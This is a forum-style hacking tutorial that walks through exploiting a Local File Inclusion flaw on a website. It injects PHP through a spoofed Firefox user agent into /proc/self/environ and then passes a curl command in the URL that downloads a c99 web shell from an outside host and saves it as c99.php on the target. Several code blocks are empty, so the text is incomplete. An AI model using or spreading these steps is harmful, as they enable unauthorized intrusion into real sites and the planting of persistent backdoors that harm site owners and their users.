LFI ( Local File Inclusion ): How to upload SHELL ( C99 .txt )

Continuing to our post Step by Step guide for LFI (Local File Inclusion): The process of exploiting a website

Required:
1. site vuln to lfi
2. php knowledge
3. browser Mozilla Firefox...
================================
So... first you find some site vuln to lfi... now we must check if there are logs...
They are usually stored in /proc/self/environ... so just replace /etc/passwd with /proc/self/environ
If you get something like "DOCUMENT_ROOT=..." then it means you successfully found logs :D
Now,on that page you can find something like "HTTP_USER_AGENT"...
This value is usually our useragent(mozilla,netscape,etc) and now we must spoof it... but how?
Open a new tab in Mozilla,and type "about:config" (without quotes)...
Now,in "Filter" type: general.useragent.extra.firefox
You will get something like this:

Code:

Preference name                            Status     Type        Value
general.useragent.extra.firefox     default     string       Firefox/3.0.7

Now,double click on general.useragent.extra.firefox and replace "Firefox/3.0.7"
with

Code:

If everything is good you will get shell included... Otherwise,you will get errors... Mostly I was getting error "URL-File access disabled" or something like that... but using php I found another way...
Instead of typing

Code:

as useragent,type this:

Code:

Then load your vuln page like this:

Code:

http://yourvulnsite.com/vulnscript.php?page=../../../proc/self/environ?cmd=curl http://shelladress.com/c99.txt -o c99.php

So,lets review... basicaly,you are just adding &cmd= thing at the end of url...
Now,using "curl" command you will get content of shell in txt format and by using -o c99.php you will rename it to c99.php...
Now simply go to your site like this:

Code:

http://yourvulnsite.com/c99.php

And that's all for now...cheers!

Source: Pinoy